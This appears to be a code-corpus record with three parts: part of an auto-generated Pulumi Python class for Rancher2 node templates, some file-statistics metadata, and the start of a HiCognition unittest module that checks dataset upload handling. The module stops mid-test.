resource_args, opts = _utilities.get_resource_args_opts(NodeTemplateArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
amazonec2_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateAmazonec2ConfigArgs']]] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
auth_certificate_authority: Optional[pulumi.Input[str]] = None,
auth_key: Optional[pulumi.Input[str]] = None,
azure_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateAzureConfigArgs']]] = None,
cloud_credential_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
digitalocean_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateDigitaloceanConfigArgs']]] = None,
driver_id: Optional[pulumi.Input[str]] = None,
engine_env: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_insecure_registries: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_install_url: Optional[pulumi.Input[str]] = None,
engine_label: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_opt: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_registry_mirrors: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_storage_driver: Optional[pulumi.Input[str]] = None,
hetzner_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateHetznerConfigArgs']]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
linode_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateLinodeConfigArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
node_taints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NodeTemplateNodeTaintArgs']]]]] = None,
opennebula_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateOpennebulaConfigArgs']]] = None,
openstack_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateOpenstackConfigArgs']]] = None,
use_internal_ip_address: Optional[pulumi.Input[bool]] = None,
vsphere_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateVsphereConfigArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = NodeTemplateArgs.__new__(NodeTemplateArgs)
__props__.__dict__["amazonec2_config"] = amazonec2_config
__props__.__dict__["annotations"] = annotations
__props__.__dict__["auth_certificate_authority"] = auth_certificate_authority
__props__.__dict__["auth_key"] = auth_key
__props__.__dict__["azure_config"] = azure_config
__props__.__dict__["cloud_credential_id"] = cloud_credential_id
__props__.__dict__["description"] = description
__props__.__dict__["digitalocean_config"] = digitalocean_config
__props__.__dict__["driver_id"] = driver_id
__props__.__dict__["engine_env"] = engine_env
__props__.__dict__["engine_insecure_registries"] = engine_insecure_registries
__props__.__dict__["engine_install_url"] = engine_install_url
__props__.__dict__["engine_label"] = engine_label
__props__.__dict__["engine_opt"] = engine_opt
__props__.__dict__["engine_registry_mirrors"] = engine_registry_mirrors
__props__.__dict__["engine_storage_driver"] = engine_storage_driver
__props__.__dict__["hetzner_config"] = hetzner_config
__props__.__dict__["labels"] = labels
__props__.__dict__["linode_config"] = linode_config
__props__.__dict__["name"] = name
__props__.__dict__["node_taints"] = node_taints
__props__.__dict__["opennebula_config"] = opennebula_config
__props__.__dict__["openstack_config"] = openstack_config
__props__.__dict__["use_internal_ip_address"] = use_internal_ip_address
__props__.__dict__["vsphere_config"] = vsphere_config
__props__.__dict__["driver"] = None
super(NodeTemplate, __self__).__init__(
'rancher2:index/nodeTemplate:NodeTemplate',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
amazonec2_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateAmazonec2ConfigArgs']]] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
auth_certificate_authority: Optional[pulumi.Input[str]] = None,
auth_key: Optional[pulumi.Input[str]] = None,
azure_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateAzureConfigArgs']]] = None,
cloud_credential_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
digitalocean_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateDigitaloceanConfigArgs']]] = None,
driver: Optional[pulumi.Input[str]] = None,
driver_id: Optional[pulumi.Input[str]] = None,
engine_env: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_insecure_registries: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_install_url: Optional[pulumi.Input[str]] = None,
engine_label: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_opt: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_registry_mirrors: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_storage_driver: Optional[pulumi.Input[str]] = None,
hetzner_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateHetznerConfigArgs']]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
linode_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateLinodeConfigArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
node_taints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NodeTemplateNodeTaintArgs']]]]] = None,
opennebula_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateOpennebulaConfigArgs']]] = None,
openstack_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateOpenstackConfigArgs']]] = None,
use_internal_ip_address: Optional[pulumi.Input[bool]] = None,
vsphere_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateVsphereConfigArgs']]] = None) -> 'NodeTemplate':
"""
Get an existing NodeTemplate resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['NodeTemplateAmazonec2ConfigArgs']] amazonec2_config: AWS config for the Node Template (list maxitems:1)
:param pulumi.Input[Mapping[str, Any]] annotations: Annotations for Node Template object (map)
:param pulumi.Input[str] auth_certificate_authority: Auth certificate authority for the Node Template (string)
:param pulumi.Input[str] auth_key: Auth key for the Node Template (string)
:param pulumi.Input[pulumi.InputType['NodeTemplateAzureConfigArgs']] azure_config: Azure config for the Node Template (list maxitems:1)
:param pulumi.Input[str] cloud_credential_id: Cloud credential ID for the Node Template. Required from Rancher v2.2.x (string)
:param pulumi.Input[str] description: Description for the Node Template (string)
:param pulumi.Input[pulumi.InputType['NodeTemplateDigitaloceanConfigArgs']] digitalocean_config: Digitalocean config for the Node Template (list maxitems:1)
:param pulumi.Input[str] driver: (Computed) The driver of the node template (string)
:param pulumi.Input[str] driver_id: The node driver id used by the node template. It's required if the node driver isn't built in Rancher (string)
:param pulumi.Input[Mapping[str, Any]] engine_env: Engine environment for the node template (string)
:param pulumi.Input[Sequence[pulumi.Input[str]]] engine_insecure_registries: Insecure registry for the node template (list)
:param pulumi.Input[str] engine_install_url: Docker engine install URL for the node template. Available install docker versions at `https://github.com/rancher/install-docker` (string)
:param pulumi.Input[Mapping[str, Any]] engine_label: Engine label for the node template (string)
:param pulumi.Input[Mapping[str, Any]] engine_opt: Engine options for the node template (map)
:param pulumi.Input[Sequence[pulumi.Input[str]]] engine_registry_mirrors: Engine registry mirror for the node template (list)
:param pulumi.Input[str] engine_storage_driver: Engine storage driver for the node template (string)
:param pulumi.Input[pulumi.InputType['NodeTemplateHetznerConfigArgs']] hetzner_config: Hetzner config for the Node Template (list maxitems:1)
:param pulumi.Input[Mapping[str, Any]] labels: Labels for Node Template object (map)
:param pulumi.Input[pulumi.InputType['NodeTemplateLinodeConfigArgs']] linode_config: Linode config for the Node Template (list maxitems:1)
:param pulumi.Input[str] name: The name of the Node Template (string)
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NodeTemplateNodeTaintArgs']]]] node_taints: Node taints. For Rancher v2.3.3 or above (List)
:param pulumi.Input[pulumi.InputType['NodeTemplateOpennebulaConfigArgs']] opennebula_config: Opennebula config for the Node Template (list maxitems:1)
:param pulumi.Input[pulumi.InputType['NodeTemplateOpenstackConfigArgs']] openstack_config: Openstack config for the Node Template (list maxitems:1)
:param pulumi.Input[bool] use_internal_ip_address: Engine storage driver for the node template (bool)
:param pulumi.Input[pulumi.InputType['NodeTemplateVsphereConfigArgs']] vsphere_config: vSphere config for the Node Template (list maxitems:1)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _NodeTemplateState.__new__(_NodeTemplateState)
__props__.__dict__["amazonec2_config"] = amazonec2_config
__props__.__dict__["annotations"] = annotations
__props__.__dict__["auth_certificate_authority"] = auth_certificate_authority
__props__.__dict__["auth_key"] = auth_key
__props__.__dict__["azure_config"] = azure_config
__props__.__dict__["cloud_credential_id"] = cloud_credential_id
__props__.__dict__["description"] = description
__props__.__dict__["digitalocean_config"] = digitalocean_config
__props__.__dict__["driver"] = driver
__props__.__dict__["driver_id"] = driver_id
__props__.__dict__["engine_env"] = engine_env
__props__.__dict__["engine_insecure_registries"] = engine_insecure_registries
__props__.__dict__["engine_install_url"] = engine_install_url
__props__.__dict__["engine_label"] = engine_label
__props__.__dict__["engine_opt"] = engine_opt
__props__.__dict__["engine_registry_mirrors"] = engine_registry_mirrors
__props__.__dict__["engine_storage_driver"] = engine_storage_driver
__props__.__dict__["hetzner_config"] = hetzner_config
__props__.__dict__["labels"] = labels
__props__.__dict__["linode_config"] = linode_config
__props__.__dict__["name"] = name
__props__.__dict__["node_taints"] = node_taints
__props__.__dict__["opennebula_config"] = opennebula_config
__props__.__dict__["openstack_config"] = openstack_config
__props__.__dict__["use_internal_ip_address"] = use_internal_ip_address
__props__.__dict__["vsphere_config"] = vsphere_config
return NodeTemplate(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="amazonec2Config")
def amazonec2_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateAmazonec2Config']]:
"""
AWS config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "amazonec2_config")
@property
@pulumi.getter
def annotations(self) -> pulumi.Output[Mapping[str, Any]]:
"""
Annotations for Node Template object (map)
"""
return pulumi.get(self, "annotations")
@property
@pulumi.getter(name="authCertificateAuthority")
def auth_certificate_authority(self) -> pulumi.Output[Optional[str]]:
"""
Auth certificate authority for the Node Template (string)
"""
return pulumi.get(self, "auth_certificate_authority")
@property
@pulumi.getter(name="authKey")
def auth_key(self) -> pulumi.Output[Optional[str]]:
"""
Auth key for the Node Template (string)
"""
return pulumi.get(self, "auth_key")
@property
@pulumi.getter(name="azureConfig")
def azure_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateAzureConfig']]:
"""
Azure config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "azure_config")
@property
@pulumi.getter(name="cloudCredentialId")
def cloud_credential_id(self) -> pulumi.Output[Optional[str]]:
"""
Cloud credential ID for the Node Template. Required from Rancher v2.2.x (string)
"""
return pulumi.get(self, "cloud_credential_id")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Description for the Node Template (string)
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="digitaloceanConfig")
def digitalocean_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateDigitaloceanConfig']]:
"""
Digitalocean config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "digitalocean_config")
@property
@pulumi.getter
def driver(self) -> pulumi.Output[str]:
"""
(Computed) The driver of the node template (string)
"""
return pulumi.get(self, "driver")
@property
@pulumi.getter(name="driverId")
def driver_id(self) -> pulumi.Output[str]:
"""
The node driver id used by the node template. It's required if the node driver isn't built in Rancher (string)
"""
return pulumi.get(self, "driver_id")
@property
@pulumi.getter(name="engineEnv")
def engine_env(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
Engine environment for the node template (string)
"""
return pulumi.get(self, "engine_env")
@property
@pulumi.getter(name="engineInsecureRegistries")
def engine_insecure_registries(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Insecure registry for the node template (list)
"""
return pulumi.get(self, "engine_insecure_registries")
@property
@pulumi.getter(name="engineInstallUrl")
def engine_install_url(self) -> pulumi.Output[str]:
"""
Docker engine install URL for the node template. Available install docker versions at `https://github.com/rancher/install-docker` (string)
"""
return pulumi.get(self, "engine_install_url")
@property
@pulumi.getter(name="engineLabel")
def engine_label(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
Engine label for the node template (string)
"""
return pulumi.get(self, "engine_label")
@property
@pulumi.getter(name="engineOpt")
def engine_opt(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
Engine options for the node template (map)
"""
return pulumi.get(self, "engine_opt")
@property
@pulumi.getter(name="engineRegistryMirrors")
def engine_registry_mirrors(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Engine registry mirror for the node template (list)
"""
return pulumi.get(self, "engine_registry_mirrors")
@property
@pulumi.getter(name="engineStorageDriver")
def engine_storage_driver(self) -> pulumi.Output[Optional[str]]:
"""
Engine storage driver for the node template (string)
"""
return pulumi.get(self, "engine_storage_driver")
@property
@pulumi.getter(name="hetznerConfig")
def hetzner_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateHetznerConfig']]:
"""
Hetzner config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "hetzner_config")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Mapping[str, Any]]:
"""
Labels for Node Template object (map)
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="linodeConfig")
def linode_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateLinodeConfig']]:
"""
Linode config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "linode_config")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the Node Template (string)
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="nodeTaints")
def node_taints(self) -> pulumi.Output[Optional[Sequence['outputs.NodeTemplateNodeTaint']]]:
    """Node taints. For Rancher v2.3.3 or above (List)"""
    taints = pulumi.get(self, "node_taints")
    return taints
@property
@pulumi.getter(name="opennebulaConfig")
def opennebula_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateOpennebulaConfig']]:
    """Opennebula config for the Node Template (list maxitems:1)"""
    config = pulumi.get(self, "opennebula_config")
    return config
@property
@pulumi.getter(name="openstackConfig")
def openstack_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateOpenstackConfig']]:
    """Openstack config for the Node Template (list maxitems:1)"""
    config = pulumi.get(self, "openstack_config")
    return config
@property
@pulumi.getter(name="useInternalIpAddress")
def use_internal_ip_address(self) -> pulumi.Output[Optional[bool]]:
    """
    Use internal IP address for the node template (bool)
    """
    return pulumi.get(self, "use_internal_ip_address")
@property
@pulumi.getter(name="vsphereConfig")
def vsphere_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateVsphereConfig']]:
    """vSphere config for the Node Template (list maxitems:1)"""
    config = pulumi.get(self, "vsphere_config")
    return config
| 49.190574
| 191
| 0.672152
| 7,994
| 72,015
| 5.831123
| 0.038029
| 0.088257
| 0.093341
| 0.054061
| 0.957781
| 0.952976
| 0.94137
| 0.939074
| 0.936693
| 0.920217
| 0
| 0.00433
| 0.22076
| 72,015
| 1,463
| 192
| 49.224197
| 0.826327
| 0.315184
| 0
| 0.905119
| 1
| 0
| 0.158665
| 0.088284
| 0
| 0
| 0
| 0
| 0
| 1
| 0.168539
| false
| 0.001248
| 0.008739
| 0
| 0.278402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6f21b04b069c85910c0a3464783dc84c779b1f01
| 24,508
|
py
|
Python
|
back_end/tests/post_routes/test_api_add_datasets.py
|
gerlichlab/HiCognition
|
dff022025b7c83732b9510ff5ca8232d30aa5304
|
[
"MIT"
] | null | null | null |
back_end/tests/post_routes/test_api_add_datasets.py
|
gerlichlab/HiCognition
|
dff022025b7c83732b9510ff5ca8232d30aa5304
|
[
"MIT"
] | 5
|
2022-03-31T11:54:12.000Z
|
2022-03-31T12:04:29.000Z
|
back_end/tests/post_routes/test_api_add_datasets.py
|
gerlichlab/HiCognition
|
dff022025b7c83732b9510ff5ca8232d30aa5304
|
[
"MIT"
] | null | null | null |
"""Module with tests related to adding datasets."""
import os
import io
import json
import unittest
from unittest.mock import patch
from hicognition.test_helpers import LoginTestCase, TempDirTestCase
# add path to import app
# import sys
# sys.path.append("./")
from app.models import Dataset, Assembly
from app import db
class TestAddDataSets(LoginTestCase, TempDirTestCase):
    """Tests correct launching of pipelines after addition of datasets.

    Inherits both from LoginTestCase and TempDirTestCase to be able to
    log in and to create a temporary directory for uploaded files.
    """

    # Show full diffs for the large expected/actual dict comparisons.
    maxDiff = None

    def setUp(self):
        """Create a test assembly and an authenticated user with token headers."""
        super().setUp()
        # add assembly
        self.hg19 = Assembly(
            id=1,
            name="hg19",
            chrom_sizes=self.app.config["CHROM_SIZES"],
            chrom_arms=self.app.config["CHROM_ARMS"],
        )
        db.session.add(self.hg19)
        db.session.commit()
        # add token headers
        token = self.add_and_authenticate("test", "asdf")
        # create token_header
        self.token_headers = self.get_token_header(token)
        # add content-type
        self.token_headers["Content-Type"] = "multipart/form-data"

    @patch("app.api.post_routes.parse_binsizes")
    @patch("app.models.User.launch_task")
    def test_dataset_added_correctly_cooler(self, mock_launch, mock_parse_binsizes):
        """Tests whether a cooler dataset is added
        correctly to the Dataset table following
        a post request."""
        # define return values
        mock_parse_binsizes.return_value = [5000000]
        # construct form data
        data = {
            "datasetName": "test",
            "description": "test-description",
            "assembly": "1",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "ValueType": "Interaction",
            "Method": "HiC",
            "Normalization": "ICCF",
            "filetype": "cooler",
            "public": "false",
            "file": (open("tests/testfiles/test.mcool", "rb"), "test.mcool"),
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 200)
        # check whether dataset has been added to database
        self.assertEqual(len(Dataset.query.all()), 1)
        dataset = Dataset.query.first()
        expected = {
            "normalization": "ICCF",
            "dataset_name": "test",
            "processing_state": "uploaded",
            "description": "test-description",
            "perturbation": "No perturbation",
            "file_path": "./tmp_test/1_test.mcool",
            "assembly": 1,
            "public": False,
            "processing_datasets": [],
            "failed_datasets": [],
            "processing_collections": [],
            "failed_collections": [],
            "cellCycleStage": "asynchronous",
            "valueType": "Interaction",
            "filetype": "cooler",
            "method": "HiC",
            "available_binsizes": '["5000000"]',
            "user_id": 1,
            "id": 1,
        }
        self.assertEqual(expected, dataset.to_json())
        # test whether uploaded file exists
        self.assertTrue(os.path.exists(dataset.file_path))
        # test whether uploaded file is equal to expected file
        # (fix: use context managers so the file handles are closed;
        # the originals were left open)
        with open("tests/testfiles/test.mcool", "rb") as expected_file, open(
            dataset.file_path, "rb"
        ) as actual_file:
            self.assertEqual(expected_file.read(), actual_file.read())

    @patch("app.models.User.launch_task")
    def test_dataset_added_correctly_bigwig_bw_ending(self, mock_launch):
        """Tests whether a bigwig dataset is added
        correctly to the Dataset table following
        a post request."""
        # construct form data
        data = {
            "datasetName": "test",
            "assembly": "1",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "description": "test-description",
            "ValueType": "ChromatinAssociation",
            "Protein": "CTCF",
            "public": "false",
            "Method": "ChipSeq",
            "Normalization": "RPM",
            "filetype": "bigwig",
            "file": (open("tests/testfiles/test.bw", "rb"), "test.bw"),
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 200)
        # check whether dataset has been added to database
        self.assertEqual(len(Dataset.query.all()), 1)
        dataset = Dataset.query.first()
        expected = {
            "method": "ChipSeq",
            "id": 1,
            "user_id": 1,
            "normalization": "RPM",
            "dataset_name": "test",
            "processing_state": "uploaded",
            "description": "test-description",
            "perturbation": "No perturbation",
            "file_path": "./tmp_test/1_test.bw",
            "processing_datasets": [],
            "failed_datasets": [],
            "processing_collections": [],
            "failed_collections": [],
            "assembly": 1,
            "public": False,
            "cellCycleStage": "asynchronous",
            "protein": "CTCF",
            "valueType": "ChromatinAssociation",
            "filetype": "bigwig",
        }
        self.assertEqual(expected, dataset.to_json())
        # test whether uploaded file exists
        self.assertTrue(os.path.exists(dataset.file_path))
        # test whether uploaded file is equal to expected file
        with open("tests/testfiles/test.bw", "rb") as expected_file, open(
            dataset.file_path, "rb"
        ) as actual_file:
            self.assertEqual(expected_file.read(), actual_file.read())

    @patch("app.models.User.launch_task")
    def test_dataset_added_correctly_bigwig_bigwig_ending(self, mock_launch):
        """Tests whether a bigwig dataset is added
        correctly to the Dataset table following
        a post request."""
        # construct form data
        # (fix: removed stray "processing_datasets" key that had been
        # copy-pasted from an expected-output dict; it is not a form field)
        data = {
            "datasetName": "test",
            "assembly": "1",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "description": "test-description",
            "ValueType": "ChromatinAssociation",
            "Protein": "CTCF",
            "public": "false",
            "Method": "ChipSeq",
            "Normalization": "RPM",
            "filetype": "bigwig",
            "file": (open("tests/testfiles/test.bigwig", "rb"), "test.bigwig"),
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 200)
        # check whether dataset has been added to database
        self.assertEqual(len(Dataset.query.all()), 1)
        dataset = Dataset.query.first()
        expected = {
            "method": "ChipSeq",
            "id": 1,
            "user_id": 1,
            "normalization": "RPM",
            "dataset_name": "test",
            "processing_state": "uploaded",
            "description": "test-description",
            "perturbation": "No perturbation",
            "file_path": "./tmp_test/1_test.bigwig",
            "processing_datasets": [],
            "failed_datasets": [],
            "processing_collections": [],
            "failed_collections": [],
            "assembly": 1,
            "public": False,
            "cellCycleStage": "asynchronous",
            "protein": "CTCF",
            "valueType": "ChromatinAssociation",
            "filetype": "bigwig",
        }
        self.assertEqual(expected, dataset.to_json())
        # test whether uploaded file exists
        self.assertTrue(os.path.exists(dataset.file_path))
        # test whether uploaded file is equal to expected file
        # (fix: compare against the file that was actually uploaded,
        # test.bigwig, not test.bw from the previous test)
        with open("tests/testfiles/test.bigwig", "rb") as expected_file, open(
            dataset.file_path, "rb"
        ) as actual_file:
            self.assertEqual(expected_file.read(), actual_file.read())

    @patch("app.api.post_routes.parse_binsizes")
    @patch("app.models.User.launch_task")
    def test_dataset_added_correctly_cooler_wo_description(
        self, mock_launch, mock_parse_binsizes
    ):
        """Tests whether a cooler dataset without a description is added
        correctly to the Dataset table following a post request and gets
        a default description."""
        # add return values
        mock_parse_binsizes.return_value = [5000000]
        # construct form data
        data = {
            "datasetName": "test",
            "assembly": "1",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "ValueType": "Interaction",
            "Method": "HiC",
            "public": "false",
            "Normalization": "ICCF",
            "filetype": "cooler",
            "file": (open("tests/testfiles/test.mcool", "rb"), "test.mcool"),
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 200)
        # check whether dataset has been added to database
        self.assertEqual(len(Dataset.query.all()), 1)
        dataset = Dataset.query.first()
        expected = {
            "normalization": "ICCF",
            "dataset_name": "test",
            "processing_state": "uploaded",
            "description": "No description provided",
            "perturbation": "No perturbation",
            "file_path": "./tmp_test/1_test.mcool",
            "processing_datasets": [],
            "failed_datasets": [],
            "processing_collections": [],
            "failed_collections": [],
            "assembly": 1,
            "public": False,
            "cellCycleStage": "asynchronous",
            "valueType": "Interaction",
            "filetype": "cooler",
            "method": "HiC",
            "available_binsizes": '["5000000"]',
            "user_id": 1,
            "id": 1,
        }
        self.assertEqual(expected, dataset.to_json())
        # check whether binsizes have been added correctly -> test cooler contains single resolution with size 5 * 10**6
        self.assertEqual(json.loads(dataset.available_binsizes), ["5000000"])

    @patch("app.models.User.launch_task")
    def test_dataset_added_correctly_bed(self, mock_launch):
        """Tests whether a bed dataset is added
        correctly to the Dataset table following
        a post request."""
        # construct form data
        data = {
            "datasetName": "test",
            "assembly": "1",
            "description": "test-description",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "ValueType": "Derived",
            "public": "false",
            "Method": "HiC",
            "SizeType": "Interval",
            "filetype": "bedfile",
            "file": (io.BytesIO(b"abcdef"), "test.bed"),
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 200)
        # check whether dataset has been added to database
        self.assertEqual(len(Dataset.query.all()), 1)
        dataset = Dataset.query.first()
        expected = {
            "dataset_name": "test",
            "processing_state": "processing",
            "description": "test-description",
            "sizeType": "Interval",
            "perturbation": "No perturbation",
            "file_path": "./tmp_test/1_test.bed",
            "processing_datasets": [],
            "failed_datasets": [],
            "processing_collections": [],
            "failed_collections": [],
            "assembly": 1,
            "public": False,
            "cellCycleStage": "asynchronous",
            "valueType": "Derived",
            "filetype": "bedfile",
            "method": "HiC",
            "user_id": 1,
            "id": 1,
        }
        self.assertEqual(expected, dataset.to_json())
        # test whether uploaded file exists
        self.assertTrue(os.path.exists(dataset.file_path))
        # test whether uploaded file is equal to expected file
        expected_file = b"abcdef"
        with open(dataset.file_path, "rb") as actual_file:
            self.assertEqual(expected_file, actual_file.read())

    @patch("app.models.User.launch_task")
    def test_incorrect_filetype_is_rejected(self, mock_launch):
        """Tests whether incorrect filetype is rejected"""
        # construct form data
        data = {
            "datasetName": "test",
            "assembly": "1",
            "description": "test-description",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "ValueType": "Derived",
            "public": "false",
            "Method": "HiC",
            "SizeType": "Interval",
            "filetype": "bad",
            "file": (io.BytesIO(b"abcdef"), "test.bed"),
            "Directionality": "-",
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 400)

    @patch("app.models.User.launch_task")
    def test_bed_pipeline_launched_correctly(self, mock_launch):
        """Tests whether bed pipeline is called with the right arguments."""
        # construct form data
        data = {
            "datasetName": "test",
            "assembly": "1",
            "description": "test-description",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "ValueType": "Derived",
            "Method": "HiC",
            "public": "false",
            "SizeType": "Interval",
            "filetype": "bedfile",
            "file": (io.BytesIO(b"abcdef"), "test.bed"),
            "Directionality": "-",
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        # check whether launch task has been called with the right arguments
        mock_launch.assert_called_with(
            self.app.queues["short"], "pipeline_bed", "run bed preprocessing", 1
        )

    def test_badform_no_dataset_name(self):
        """Tests whether form without datasetName is rejected"""
        # construct form data
        data = {
            "assembly": "1",
            "description": "test-description",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "ValueType": "Derived",
            "public": "false",
            "Method": "HiC",
            "SizeType": "Interval",
            "filetype": "bedfile",
            "file": (io.BytesIO(b"abcdef"), "test.bed"),
            "Directionality": "-",
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 400)

    def test_badform_no_file_object(self):
        """Tests whether form without file is rejected"""
        # construct form data
        data = {
            "datasetName": "IE",
            "assembly": "1",
            "description": "test-description",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "ValueType": "Derived",
            "public": "false",
            "Method": "HiC",
            "SizeType": "Interval",
            "filetype": "bedfile",
            "Directionality": "-",
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 400)

    def test_badform_bed_file_cooler_filetype(self):
        """Tests whether form with bedfile, but cooler file-ending is rejected"""
        # construct form data
        data = {
            "datasetName": "test",
            "assembly": "1",
            "description": "test-description",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "ValueType": "Derived",
            "public": "false",
            "Method": "HiC",
            "SizeType": "Interval",
            "filetype": "bedfile",
            "file": (io.BytesIO(b"abcdef"), "test.mcool"),
            "Directionality": "-",
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 400)

    def test_badform_cooler_file_bed_filetype(self):
        """Tests whether form with cooler, but bed file-ending is rejected"""
        # construct form data
        data = {
            "datasetName": "test",
            "description": "test-description",
            "assembly": "1",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "public": "false",
            "ValueType": "Interaction",
            "Method": "HiC",
